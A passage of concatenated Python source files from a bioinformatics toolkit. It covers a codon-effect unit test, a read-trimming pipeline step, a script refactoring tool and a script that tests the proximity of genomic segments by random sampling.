else:
self.assertEqual(r.ndeleted_codons, 0)
self.assert_(r.noframe_codons <= self.ncodons)
self.assertEqual(r.first_stop, 0)
# self.assertEqual( r.nunaffected_codons, self.ncodons )
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testStop(self):
'''test one stop codon.'''
for x in range(len(self.seq)):
s = list(self.seq)
s[x] = "T"
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print s, str(r)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nsynonymous_codons, 0)
if x % 3 == 0:
self.assertEqual(r.nstops, 1)
self.assertEqual(r.first_stop, x // 3)
# ignore last incomplete codon
if x < self.length - 3:
self.assertEqual(r.nstop_codons, 1)
self.assertEqual(r.nnonsynonymous_codons, 0)
else:
self.assertEqual(r.nstops, 0)
self.assertEqual(r.first_stop, self.ncodons)
self.assertEqual(r.nstop_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 1)
def testMutation(self):
'''test synonymous/nonsynonymous mutation.'''
for x in range(len(self.seq)):
s = list(self.seq)
# aaa = K, aag = N
s[x] = "G"
r = snp2counts.countEffectsOnTranscript(s, self.seq)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nstops, 0)
self.assertEqual(r.first_stop, self.ncodons)
self.assertEqual(r.nstop_codons, 0)
if x % 3 == 2:
self.assertEqual(r.nsynonymous_codons, 1)
self.assertEqual(r.nnonsynonymous_codons, 0)
else:
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 1)
def testStopDouble(self):
'''test two stop codons.'''
ref = list(self.seq)
ref[-3] = "T"
for x in range(len(ref) - 3):
s = list(ref)
s[x] = "T"
r = snp2counts.countEffectsOnTranscript(s, ref)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
if x % 3 == 0:
self.assertEqual(r.nstops, 2)
self.assertEqual(r.first_stop, x // 3)
# ignore last incomplete codon
self.assertEqual(r.nstop_codons, 1)
else:
self.assertEqual(r.nstops, 1)
self.assertEqual(r.first_stop, self.ncodons - 1)
self.assertEqual(r.nstop_codons, 0)
if __name__ == "__main__":
unittest.main()
```
#### File: cgat/obsolete/trim_reads_fastq.py
```python
import sys
import tempfile
import optparse
import shutil
import itertools
import csv
import math
import random
import re
import glob
import os
import shutil
import collections
import gzip
import CGAT.Experiment as E
import logging as L
from ruffus import *
import CGATPipelines.PipelineMapping as PipelineMapping
USECLUSTER = True
###################################################
###################################################
###################################################
## Pipeline configuration
###################################################
import CGAT.Pipeline as P
P.getParameters( ["%s.ini" % __file__[:-len(".py")], "../pipeline.ini", "pipeline.ini" ] )
PARAMS = P.PARAMS
PARAMS_ANNOTATIONS = P.peekParameters( PARAMS["annotations_dir"],"pipeline_annotations.py" )
###################################################################
###################################################################
###################################################################
## TRIM READS
@follows(mkdir("trim"))
@transform( "*.gz", regex( r"(\S+).gz"), r"trim/\1.gz" )
def trimReads( infile, outfile ):
'''trim reads with FastX'''
to_cluster = True
tmpdir_fastq = P.getTempDir()
track = P.snip( os.path.basename( infile ), ".gz" )
statement = """gunzip < %(infile)s | python %%(scriptsdir)s/fastq2fastq.py
--change-format=sanger
--guess-format=phred64
--log=%(outfile)s.log
> %(tmpdir_fastq)s/%(track)s;""" % locals()
statement += """zcat %(infile)s | fastx_trimmer -f %(first_base)s -l %(last_base)s -z -o %(outfile)s """
P.run()
```
#### File: cgat/refactor/cgat_refactor.py
```python
import os
import sys
import re
import glob
import pandas
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
def checkUnique(l):
'''check if elements is list l are unique.'''
# check for unique mapping
values = list(sorted(l))
unique = set(values)
if len(values) != len(unique):
raise ValueError(
"non-unique option mappings")
else:
E.info("option list is unique")
def checkOverlap(a, b):
'''check if a and b not overlap.'''
aa = set(list(a))
bb = set(list(b))
if len(aa.intersection(bb)) != 0:
raise ValueError(
"option lists are not separate: shared=%s" %
",".join(aa.intersection(bb)))
else:
E.info("no overlap between option lists")
def updateFiles(dirs, map_old2new, counter,
suffixes,
regex_restrict=None,
dry_run=False):
'''iterate through all files in dirs and
replace patterns is map_old2new'''
if regex_restrict:
rx = re.compile(regex_restrict)
else:
rx = None
for d in dirs:
for root, dirs, files in os.walk(d):
for f in files:
_, ext = os.path.splitext(f)
if rx and not rx.search(f):
continue
if ext not in suffixes:
continue
counter.files_examined += 1
fn = os.path.join(root, f)
with IOTools.openFile(fn, "r") as inf:
old_data = inf.read()
changed = False
for old_name, new_name in map_old2new.items():
# only replace at word boundaries
old_name += """(['`\s"=])"""
new_name += r"\1"
new_data = re.sub(old_name, new_name, old_data)
if old_data != new_data:
changed = True
E.info("changed: %s : %s to %s" %
(fn, old_name, new_name))
old_data = new_data
if changed:
counter.files_changed += 1
if not dry_run:
with IOTools.openFile(fn, "w") as outf:
outf.write(new_data)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--scripts", dest="rename_scripts", type="string",
help="rename scripts")
parser.add_option("--options", dest="rename_options", type="string",
help="rename command line options")
parser.add_option("--split-prefix", dest="split_prefix",
type="string",
help="move scripts with prefix to subdirectory")
parser.add_option("--suffix", dest="suffixes", action="append",
type="string",
help="file suffixes to use.")
parser.add_option("-n", "--dry-run", dest="dry_run",
action="store_true",
help="dry run, do not implement any changes")
parser.add_option("--restrict-regex", dest="regex_restrict", type="string",
help="regular expression to restrict refactoring to")
parser.add_option("-d", "--directories", dest="dirs", action="append",
type="string",
help="directories to change files in [%defaul]")
parser.set_defaults(
rename_scripts=None,
rename_options=None,
split_prefix=None,
scriptsdir="scripts",
dirs=[],
suffixes=[],
dry_run=False,
regex_restrict=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(options.suffixes) == 0:
raise ValueError("please supply --suffixes")
if len(options.dirs) == 0:
raise ValueError("please supply --directories")
scriptsdir = options.scriptsdir
counter = E.Counter()
map_old2new = {}
if options.rename_scripts or options.split_prefix:
if options.rename:
with IOTools.openFile(options.rename_scripts, "r") as inf:
for line in inf:
if line.startswith("#"):
continue
if line.startswith("old"):
continue
try:
old, new = line[:-1].split("\t")
except ValueError:
continue
if not os.path.exists(os.path.join(scriptsdir, old)):
E.warn("%s does not exist - no renaming" % old)
continue
map_old2new[old] = new
elif options.split_prefix:
if not os.path.exists(os.path.join(scriptsdir,
options.split_prefix)):
E.warn("destination %s does not exist - no renaming" %
options.split_prefix)
return
scripts = glob.glob("%s/%s_*.py" % (scriptsdir,
options.split_prefix))
if len(scripts) == 0:
E.info("nothing to change")
return
for script in scripts:
scriptname = os.path.basename(script)
newname = scriptname[len(options.split_prefix) + 1:]
map_old2new[scriptname] = "%s/%s" % (options.split_prefix,
newname)
if len(map_old2new) == 0:
E.info("nothing to change")
return
for old, new in map_old2new.items():
statement = "git mv %(scriptsdir)s/%(old)s %(scriptsdir)s/%(new)s" % locals()
counter.renamed += 1
if options.dry_run:
E.info(statement)
else:
E.run(statement)
updateFiles(options.dirs,
map_old2new, counter,
suffixes=options.suffixes,
dry_run=options.dry_run)
elif options.rename_options:
# read refactoring guides
table = pandas.read_csv(
IOTools.openFile(options.rename_options),
sep="\t")
# select all options that need to renamed
selected = table[table.action == "rename"]
# check if all are unique
checkUnique(selected["option"])
checkOverlap(selected["option"],
selected["alternative"])
# build map adding "--" prefix
map_old2new = dict(zip(
["--%s" % x for x in selected["option"]],
["--%s" % x for x in selected["alternative"]]))
updateFiles(options.dirs, map_old2new, counter,
suffixes=options.suffixes,
regex_restrict=options.regex_restrict,
dry_run=options.dry_run)
E.info(str(counter))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/annotator_distance.py
```python
import os
import sys
import collections
import itertools
import CGAT.GTF as GTF
import CGAT.Bed as Bed
import CGAT.Intervals as Intervals
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
import bx.intervals.intersection
import numpy
import random
import math
import array
import scipy
import scipy.stats
import matplotlib.pyplot as plt
# global functions, defined once for optimization purposes
normalize_transform = lambda x, y: numpy.array(x, float) / (sum(x) + y)
cumulative_transform = lambda x, y: numpy.cumsum(
numpy.array(x, float) / (sum(x) + y))
def readWorkspace(infile,
workspace_builder="raw",
label="none",
map_id2annotation={}):
"""read workspace from infile.
A workspace is a collection of intervals with two labels associated
to each interval, one for the 5' and one for the 3' end.
Available workspace builders are:
gff
take a gff file.
gtf-intergenic
build workspace from intergenic segments in a gtf file.
gtf-intronic
build workspace from intronic segments in a gtf file
gtf-genic
the workspace is built from genes (first to last exon).
Available labels are:
none
no labels are given to the ends of workspaces
direction
labels are given based on the 5'/3' end of the
bounding exon
annotation
labels are given based on a gene2annotation map.
returns a list of segments for each contig in a dictionary
"""
if label == "none":
label_f = lambda x, y: (("X",), ("X",))
info_f = lambda x: None
elif label == "direction":
label_f = lambda x, y: ((("5", "3")[x],), (("3", "5")[y],))
info_f = lambda x: x.strand == "+"
elif label == "annotation":
label_f = lambda x, y: (map_id2annotation[x], map_id2annotation[y])
info_f = lambda x: x.gene_id
if workspace_builder == "gff":
workspace = GTF.readAsIntervals(GFF.iterator(infile))
elif workspace_builder == "gtf-intergenic":
workspace = collections.defaultdict(list)
# get all genes
for e in GTF.merged_gene_iterator(GTF.iterator(infile)):
workspace[e.contig].append((e.start, e.end, info_f(e)))
# convert to intergenic regions.
# overlapping genes are merged and the labels
# of the right-most entry is retained
for contig in workspace.keys():
segs = workspace[contig]
segs.sort()
last = segs[0]
new_segs = []
for this in segs[1:]:
if last[1] >= this[0]:
if this[1] > last[1]:
last = (last[0], this[1], this[2])
continue
assert last[1] < this[0], "this=%s, last=%s" % (this, last)
new_segs.append((last[1], this[0],
label_f(last[2], this[2])))
last = this
workspace[contig] = new_segs
elif workspace_builder == "gtf-intronic":
workspace = collections.defaultdict(list)
# the current procedure will count nested genes
# twice
for ee in GTF.flat_gene_iterator(GTF.iterator(infile)):
exons = Intervals.combine([(e.start, e.end) for e in ee])
introns = Intervals.complement(exons)
r = ee[0]
for start, end in introns:
workspace[r.contig].append((start,
end,
label_f(info_f(r), info_f(r))
))
elif workspace_builder == "gtf-genic":
workspace = collections.defaultdict(list)
# the current procedure will count nested genes
# twice
for ee in GTF.flat_gene_iterator(GTF.iterator(infile)):
exons = Intervals.combine([(e.start, e.end) for e in ee])
start, end = exons[0][0], exons[-1][1]
r = ee[0]
workspace[r.contig].append((start,
end,
label_f(info_f(r), info_f(r))
))
else:
raise ValueError("unknown workspace_builder %s" % workspace_builder)
return workspace
def readSegments(infile, indexed_workspace,
truncate=False,
format="gtf",
keep_ambiguous=False,
remove_overhangs=False):
"""read segments from infile.
segments not overlapping with indexed_workspace are removed.
If :attr: truncate is given, segments extending beyond the workspace
are truncated.
returns a list of segments for each contig in a dictionary
"""
counter = E.Counter()
segments = collections.defaultdict(list)
def addSegment(contig, start, end, counter):
if contig in indexed_workspace:
r = indexed_workspace[contig].find(start, end)
if not r:
counter.nskipped += 1
return
if len(r) > 1:
counter.nambiguous += 1
if not keep_ambiguous:
return
if truncate:
for x in r:
wstart, wend = x.start, x.end
rstart, rend = max(start, wstart), min(end, wend)
if start < wstart or end > wend:
counter.ntruncated += 1
segments[contig].append((rstart, rend))
counter.added += 1
elif remove_overhangs:
for x in r:
wstart, wend = x.start, x.end
rstart, rend = max(start, wstart), min(end, wend)
if start < wstart or end > wend:
counter.overhangs += 1
break
else:
segments[contig].append((start, end))
else:
segments[contig].append((start, end))
counter.added += 1
counter.nkept += 1
if format == "gtf":
gtf_iterator = GTF.flat_gene_iterator(GTF.iterator(infile))
for gene in gtf_iterator:
# get start and end ignoring introns
# contig, start, end = gene[0].contig, min( [x.start for x in gene] ), max( [x.end for x in gene] )
contig, coords = gene[0].contig, [(x.start, x.end) for x in gene]
counter.ninput += 1
for start, end in coords:
addSegment(contig, start, end, counter)
elif format == "bed":
bed_iterator = Bed.iterator(infile)
for bed in bed_iterator:
counter.ninput += 1
addSegment(bed.contig, bed.start, bed.end, counter)
E.info("read segments: %s" % str(counter))
return segments
class Sampler(object):
"""base clase for objcects that create a sample of
randomly arranged segments in a workspace.
"""
def __init__(self, observed, work_start, work_end):
self.mObserved = observed
self.mWorkStart, self.mWorkEnd = work_start, work_end
self.mLengths = [x[1] - x[0] for x in observed]
self.mTotalLength = sum(self.mLengths)
self.mFreeLength = work_end - work_start - self.mTotalLength
assert self.mFreeLength >= 0, "negative length: workspace=(%i,%i) %i-%i<0, segments=%s, lengths=%s" % \
(work_start, work_end, work_end - work_start,
self.mTotalLength, self.mObserved, self.mLengths)
def sample(self):
raise NotImplementedError("define sample() in base classes")
class SamplerPermutation(Sampler):
"""permute order of fragments and distribute randomly.
The permutation works like this:
1. Randomly permutate the order of segments
2. Split the free space (:attr:mFreeSpace) within the workspace into n+1 randomly sized gaps
3. Insert the gaps between permutated segments
"""
def sample(self):
"""return simulated fragments."""
simulated = []
# 1. permutate order of segments
random.shuffle(self.mLengths)
# 2. determine size of space between samples
points = []
for x in range(len(self.mLengths) + 1):
points.append(random.randint(0, self.mFreeLength))
points.sort()
# 3. move segments to appropriate place
start = self.mWorkStart
simulated = []
last = 0
for x in range(len(self.mLengths)):
start += points[x] - last
simulated.append((start, start + self.mLengths[x]))
start += self.mLengths[x]
last = points[x]
assert start + (points[-1] - last) <= self.mWorkEnd, "start=%i, points[-1]=%i, work_end=%i" % \
(start, points[-1] - last, self.mWorkEnd)
return simulated
class SamplerBlocks(Sampler):
"""move blocks of fragments to take into account clustering."""
def sample(self):
"""return simulated fragments."""
simulated = []
raise NotImplementedError
class SamplerGaps(Sampler):
"""rearrange gaps within a block randomly.
This sampler will preserve same of the clustering structure of segments."""
def __init__(self, *args, **kwargs):
Sampler.__init__(self, *args, **kwargs)
self.mGapLengths = [x[1] - x[0]
for x in Intervals.complement(self.mObserved, self.mWorkStart, self.mWorkEnd)]
def sample(self):
"""return simulated fragments."""
simulated = []
gaps = self.mGapLengths
random.shuffle(gaps)
start = self.mWorkStart
for x in range(len(self.mLengths)):
start += gaps[x]
simulated.append((start, start + self.mLengths[x]))
start += self.mLengths[x]
return simulated
class CountingResults(object):
"""a container for observed and simulated counts.
"""
def __init__(self, labels):
self.mLabels = labels
self.mTransform = None
self.mEnvelopes = {}
self.mMedians = {}
self.mObservedCounts = None
self.mSimulatedCounts = None
self.mStats = None
def updateFDR(self, obs_pvalues, sim_pvalues):
"""compute fdr stats with given counts.
If obs_pvalues and sim_pvalues are given, computes the FDR (q-value) for the observed p-value.
The q-value is the expected proportion of false positive observations at
the observed p-value.
qvalue = A / B
A: average proportion of simulated data with P-Values < pvalue (expected false positive RATE)
B: number of observed data with P-Values < pvalue (NUMBER of true positives)
As there are several counters and labels, all observed and simulated pvalues
are taken into account.
The method needs to be called after :meth:update.
"""
assert self.mStats is not None, "updateFDR called before calling update."
for label in self.mLabels:
pvalue = self.mStats[label].pvalue
a = scipy.stats.percentileofscore(sim_palues, pvalue) / 100.0
b = scipy.stats.percentileofscore(
obs_pvalues, pvalue) / 100.0 * len(obs_pvalues)
if b >= 0:
qvalue = min(1.0, a / b)
else:
qvalue = 0
self.mStats[label] = self.mStats[label]._replace(qvalue=qvalue)
def update(self):
"""update stats from given counts.
"""
assert self.mObservedCounts is not None, "update called without observed counts."
assert self.mSimulatedCounts is not None, "update called without simulated counts."
self.mStats = {}
cls = collections.namedtuple(
"st", "observed expected ci95lower ci95upper pvalue qvalue")
for label in self.mLabels:
obs = cumulative_transform(
self.mObservedCounts[label], self.mObservedCounts.mOutOfBounds[label])
pobs = findMedian(obs)
medians = self.getMedians(label)
medians.sort()
pvalue = float(
scipy.stats.percentileofscore(medians, pobs)) / 100.0
self.mStats[label] = cls(
pobs,
scipy.mean(medians),
scipy.stats.scoreatpercentile(medians, 5),
scipy.stats.scoreatpercentile(medians, 95),
pvalue, None)
def getLabels(self):
return self.mLabels
def getMedians(self, label):
"""compute medians of all samples."""
if label not in self.mMedians:
num_samples = len(self.mSimulatedCounts)
medians = []
for x in range(num_samples):
data = self.mSimulatedCounts[x][label]
threshold = self.mSimulatedCounts[x].mTotals[label] / 2
t = 0
for d in range(len(data)):
if t > threshold:
break
t += data[d]
medians.append(d)
self.mMedians[label] = medians
return self.mMedians[label]
def getEnvelope(self, label, transform):
"""compute envelope for label using transform.
The envelope is the min, max and mean of the observed counts
add a certain position.
This function does a lazy evaluation. Pre-computed results are stored
and returned if the same transform is applied.
"""
if label in self.mEnvelopes and transform == self.mTransform:
E.debug("returning cached envelope for transform %s" %
str(transform))
return self.mEnvelopes[label]
E.debug("computing new envelope for transform %s" % str(transform))
num_samples = len(self.mSimulatedCounts)
mmin = numpy.array(transform(self.mSimulatedCounts[0][
label], self.mSimulatedCounts[0].mOutOfBounds[label]), numpy.float)
msum = numpy.array(transform(self.mSimulatedCounts[0][
label], self.mSimulatedCounts[0].mOutOfBounds[label]), numpy.float)
mmax = numpy.array(transform(self.mSimulatedCounts[0][
label], self.mSimulatedCounts[0].mOutOfBounds[label]), numpy.float)
for x in range(1, num_samples):
v = transform(
self.mSimulatedCounts[x][label], self.mSimulatedCounts[x].mOutOfBounds[label])
mmin = numpy.minimum(mmin, v)
mmax = numpy.maximum(mmax, v)
msum = msum + v
msum /= num_samples
self.mTransform = transform
self.mEnvelopes[label] = (mmin, mmax, msum)
return self.mEnvelopes[label]
class Counter(object):
"""return object that counts segments in a workspace.
A counter will implement an addCounts method that expects a sorted
list of intervals within a region bounded by start,end.
"""
# python list is fastest for single value access, but requires a lot of
# memory. python array is a good compromise - slightly slower than python list
# but uses much less space. For range access, use numpy arrays.
mBuildCounts = lambda self, num_bins, dtype: array.array(
"I", [0] * num_bins)
def __init__(self, labels, num_bins, resolution=1, dtype=numpy.int8):
self.mCounts = {}
self.mTotals = {}
# keep separate out-of-bounds counts in order to not interfere with
# dtype
self.mOutOfBounds = {}
b = self.mBuildCounts
for l in labels:
self.mCounts[l] = self.mBuildCounts(num_bins, dtype)
self.mTotals[l] = 0
self.mOutOfBounds[l] = 0
self.mNumBins = num_bins
self.mResolution = resolution
def __getitem__(self, key):
return self.mCounts[key]
def getLabels(self):
return self.mCounts.keys()
def resolve(self, value):
if self.mResolution > 1:
return int(math.floor(float(value) / self.mResolution))
else:
return value
class CounterTranscription(Counter):
"""count transcription per base."""
mName = "Transcription"
# numpy is fastest for counting with blocks of data
mBuildCounts = lambda self, num_bins, dtype: numpy.zeros(num_bins, dtype)
def addCounts(self, rr, start, end, left_labels, right_labels):
counts = self.mCounts
totals = self.mTotals
ofb = self.mOutOfBounds
nbins = self.mNumBins
resolve = self.resolve
for istart, iend in rr:
l = iend - istart
dl = istart - start
dr = end - iend
l = self.resolve(l)
if dl < dr:
pos = self.resolve(dl)
labels = left_labels
elif dl > dr:
pos = self.resolve(dr)
labels = right_labels
else:
continue
if pos >= nbins:
for label in labels:
ofb[label] += l
totals[label] += l
else:
for label in labels:
counts[label][pos:pos + l] += 1
totals[label] += l
class CounterClosestDistance(Counter):
"""count closest distance."""
mName = "Closest distance"
def addCounts(self, rr, start, end, left_labels, right_labels):
counts = self.mCounts
totals = self.mTotals
ofb = self.mOutOfBounds
nbins = self.mNumBins
resolve = self.resolve
def __add(pos, labels):
if pos >= nbins:
for label in labels:
self.mOutOfBounds[label] += 1
totals[label] += 1
else:
for label in labels:
counts[label][pos] += 1
totals[label] += 1
pos = self.resolve(rr[0][0] - start)
__add(pos, left_labels)
pos = self.resolve(end - rr[-1][1])
__add(pos, right_labels)
class CounterAllDistances(Counter):
"""count all distances."""
mName = "All distances"
def addCounts(self, rr, start, end, left_labels, right_labels):
counts = self.mCounts
totals = self.mTotals
ofb = self.mOutOfBounds
nbins = self.mNumBins
resolve = self.resolve
for istart, iend in rr:
dl = istart - start
dr = end - iend
if dl < dr:
pos = resolve(dl)
labels = left_labels
elif dl > dr:
pos = resolve(dr)
labels = right_labels
else:
continue
if pos >= nbins:
for label in labels:
ofb[label] += 1
totals[label] += 1
else:
for label in labels:
counts[label][pos] += 1
totals[label] += 1
def indexIntervals(intervals, with_values=False):
"""index intervals using bx.
"""
indexed = {}
for contig, values in intervals.iteritems():
intersector = bx.intervals.intersection.Intersecter()
if with_values:
for start, end, value in values:
intersector.add_interval(
bx.intervals.Interval(start, end, value=value))
else:
for start, end in values:
intersector.add_interval(bx.intervals.Interval(start, end))
indexed[contig] = intersector
return indexed
def plotCounts(counter, options, transform=lambda x: x):
"""create plots from counter."""
num_bins = options.num_bins
resolution = options.resolution
bins = numpy.array(xrange(num_bins)) * resolution
for label in counter.getLabels():
fig = plt.figure()
if options.plot_samples:
for x in range(options.num_samples):
counts = transform(counter.mSimulatedCounts[x][
label], counter.mSimulatedCounts[x].mOutOfBounds[label])
plt.plot(bins, counts / t, label="sample_%i" % x)
if options.plot_envelope:
# counts per sample are in row
mmin, mmax, mmean = counter.getEnvelope(label, transform)
plt.plot(bins, mmin, label="min")
plt.plot(bins, mmax, label="max")
plt.plot(bins, mmean, label="mean")
plt.plot(bins, transform(counter.mObservedCounts[
label], counter.mObservedCounts.mOutOfBounds[label]), label="observed")
plt.xlim(options.xrange)
plt.legend()
plt.title(counter.mName)
plt.xlabel("distance from gene / bp")
plt.ylabel("frequency")
fig.suptitle(str(label))
if options.logscale:
if "x" in options.logscale:
plt.gca().set_xscale('log')
if "y" in options.logscale:
plt.gca().set_yscale('log')
if options.hardcopy:
plt.savefig(os.path.expanduser(options.hardcopy % label))
def findMedian(dist):
"""find median in cumulative and normalized distribution."""
x = 0
while dist[x] < 0.5:
x += 1
return x
def main(argv=sys.argv):
parser = E.OptionParser(
version="%prog version: $Id: annotator_distance.py 2861 2010-02-23 17:36:32Z andreas $", usage=globals()["__doc__"])
parser.add_option("-a", "--annotations-tsv-file", dest="filename_annotations", type="string",
help="filename mapping gene ids to annotations (a tab-separated table with two-columns) [default=%default].")
parser.add_option("-r", "--resolution", dest="resolution", type="int",
help="resolution of count vector [default=%default].")
parser.add_option("-b", "--num-bins", dest="num_bins", type="int",
help="number of bins in count vector [default=%default].")
parser.add_option("-i", "--num-samples", dest="num_samples", type="int",
help="sample size to compute [default=%default].")
parser.add_option("-w", "--workspace-bed-file", dest="filename_workspace", type="string",
help="filename with workspace information [default=%default].")
parser.add_option("--workspace-builder", dest="workspace_builder", type="choice",
choices=(
"gff", "gtf-intergenic", "gtf-intronic", "gtf-genic"),
help="given a gff/gtf file build a workspace [default=%default].")
parser.add_option("--workspace-labels", dest="workspace_labels", type="choice",
choices=("none", "direction", "annotation"),
help="labels to use for the workspace workspace [default=%default].")
parser.add_option("--sampler", dest="sampler", type="choice",
choices=("permutation", "gaps"),
help="sampler to use. The sampler determines the null model of how segments are distributed in the workspace [default=%default]")
parser.add_option("--counter", dest="counters", type="choice", action="append",
choices=(
"transcription", "closest-distance", "all-distances"),
help="counter to use. The counter computes the quantity of interest [default=%default]")
parser.add_option("--analysis", dest="analysis", type="choice", action="append",
choices=("proximity", "area-under-curve"),
help="analysis to perform [default=%default]")
parser.add_option("--transform-counts", dest="transform_counts", type="choice",
choices=("raw", "cumulative"),
help="cumulate counts [default=%default].")
parser.add_option("-s", "--segments", dest="filename_segments", type="string",
help="filename with segment information [default=%default].")
parser.add_option("--xrange", dest="xrange", type="string",
help="xrange to plot [default=%default]")
parser.add_option("-o", "--logscale", dest="logscale", type="string",
help="use logscale on x, y or xy [default=%default]")
parser.add_option("-p", "--plot", dest="plot", action="store_true",
help="output plots [default=%default]")
parser.add_option("--hardcopy", dest="hardcopy", type="string",
help="output hardcopies to file [default=%default]")
parser.add_option("--no-fdr", dest="do_fdr", action="store_false",
help="do not compute FDR rates [default=%default]")
parser.add_option("--segments-format", dest="segments_format", type="choice",
choices=("gtf", "bed"),
help="format of segments file [default=%default].")
parser.add_option("--truncate", dest="truncate", action="store_true",
help="truncate segments extending beyond a workspace [default=%default]")
parser.add_option("--remove-overhangs", dest="remove_overhangs", action="store_true",
help="remove segments extending beyond a workspace[default=%default]")
parser.add_option("--keep-ambiguous", dest="keep_ambiguous", action="store_true",
help="keep segments extending to more than one workspace [default=%default]")
parser.set_defaults(
filename_annotations=None,
filename_workspace="workspace.gff",
filename_segments="FastDown.gtf",
filename_annotations_gtf="../data/tg1_territories.gff",
workspace_builder="gff",
workspace_labels="none",
sampler="permutation",
truncate=False,
num_bins=10000,
num_samples=10,
resolution=100,
plot_samples=False,
plot_envelope=True,
counters=[],
transform_counts="raw",
xrange=None,
plot=False,
logscale=None,
output_all=False,
do_test=False,
analysis=[],
do_fdr=True,
hardcopy="%s.png",
segments_format="gtf",
remove_overhangs=False,
)
(options, args) = E.Start(parser, argv=argv, add_output_options=True)
###########################################
# setup options
if options.sampler == "permutation":
sampler = SamplerPermutation
elif options.sampler == "gaps":
sampler = SamplerGaps
if options.xrange:
options.xrange = map(float, options.xrange.split(","))
if len(options.counters) == 0:
raise ValueError("please specify at least one counter.")
if len(options.analysis) == 0:
raise ValueError("please specify at least one analysis.")
if options.workspace_labels == "annotation" and not options.filename_annotations:
raise ValueError(
"please specify --annotations-tsv-file is --workspace-labels=annotations.")
###########################################
# read data
if options.workspace_labels == "annotation":
def constant_factory(value):
return itertools.repeat(value).next
def dicttype():
return collections.defaultdict(constant_factory(("unknown",)))
map_id2annotations = IOTools.readMultiMap(open(options.filename_annotations, "r"),
dtype=dicttype)
else:
map_id2annotations = {}
workspace = readWorkspace(open(options.filename_workspace, "r"),
options.workspace_builder,
options.workspace_labels,
map_id2annotations)
E.info("read workspace for %i contigs" % (len(workspace)))
indexed_workspace = indexIntervals(workspace, with_values=True)
segments = readSegments(open(options.filename_segments, "r"), indexed_workspace,
format=options.segments_format,
keep_ambiguous=options.keep_ambiguous,
truncate=options.truncate,
remove_overhangs=options.remove_overhangs)
nsegments = 0
for contig, vv in segments.iteritems():
nsegments += len(vv)
E.info("read %i segments for %i contigs" % (nsegments, len(workspace)))
indexed_segments = indexIntervals(segments, with_values=False)
if nsegments == 0:
E.warn("no segments read - no computation done.")
E.Stop()
return
# build labels
labels = collections.defaultdict(int)
for contig, vv in workspace.iteritems():
for start, end, v in vv:
for l in v[0]:
labels[l] += 1
for l in v[1]:
labels[l] += 1
E.info("found %i workspace labels" % len(labels))
###########################################
# setup counting containers
counters = []
for cc in options.counters:
if cc == "transcription":
counter = CounterTranscription
elif cc == "closest-distance":
counter = CounterClosestDistance
elif cc == "all-distances":
counter = CounterAllDistances
if nsegments < 256:
dtype = numpy.uint8
elif nsegments < 65536:
dtype = numpy.uint16
elif nsegments < 4294967296:
dtype = numpy.uint32
else:
dtype = numpy.int
E.debug("choosen dtype %s" % str(dtype))
E.info("samples space is %i bases: %i bins at %i resolution" %
(options.num_bins * options.resolution,
options.num_bins,
options.resolution,
))
E.info("allocating counts: %i bytes (%i labels, %i samples, %i bins)" %
(options.num_bins * len(labels) * dtype().itemsize * (options.num_samples + 1),
len(labels),
options.num_samples,
options.num_bins,
))
c = CountingResults(labels)
c.mObservedCounts = counter(
labels, options.num_bins, options.resolution, dtype=dtype)
simulated_counts = []
for x in range(options.num_samples):
simulated_counts.append(
counter(labels, options.num_bins, options.resolution, dtype=dtype))
c.mSimulatedCounts = simulated_counts
c.mName = c.mObservedCounts.mName
counters.append(c)
E.info("allocated memory successfully")
segments_per_workspace = []
segment_sizes = []
segments_per_label = collections.defaultdict(int)
workspaces_per_label = collections.defaultdict(int)
############################################
# get observed and simpulated counts
nworkspaces, nempty_workspaces, nempty_contigs, nmiddle = 0, 0, 0, 0
iteration2 = 0
for contig, vv in workspace.iteritems():
iteration2 += 1
E.info("counting %i/%i: %s %i segments" %
(iteration2,
len(workspace),
contig,
len(vv)))
if len(vv) == 0:
continue
iteration1 = 0
for work_start, work_end, v in vv:
left_labels, right_labels = v[0], v[1]
iteration1 += 1
# ignore empty segments
if contig not in indexed_segments:
nempty_contigs += 1
continue
r = indexed_segments[contig].find(work_start, work_end)
segments_per_workspace.append(len(r))
if not r:
nempty_workspaces += 1
continue
# collect segments and stats
nworkspaces += 1
observed = [(x.start, x.end) for x in r]
observed.sort()
segments_per_workspace.append(len(observed))
segment_sizes.extend([x[1] - x[0] for x in observed])
# collect basic counts
for label in list(left_labels) + list(right_labels):
workspaces_per_label[label] += 1
segments_per_label[label] += len(observed)
# add observed counts
for counter in counters:
counter.mObservedCounts.addCounts(
observed, work_start, work_end, left_labels, right_labels)
# create sampler
s = sampler(observed, work_start, work_end)
# add simulated counts
for iteration in range(options.num_samples):
simulated = s.sample()
for counter in counters:
counter.mSimulatedCounts[iteration].addCounts(
simulated, work_start, work_end, left_labels, right_labels)
E.info("counting finished")
E.info("nworkspaces=%i, nmiddle=%i, nempty_workspaces=%i, nempty_contigs=%i" %
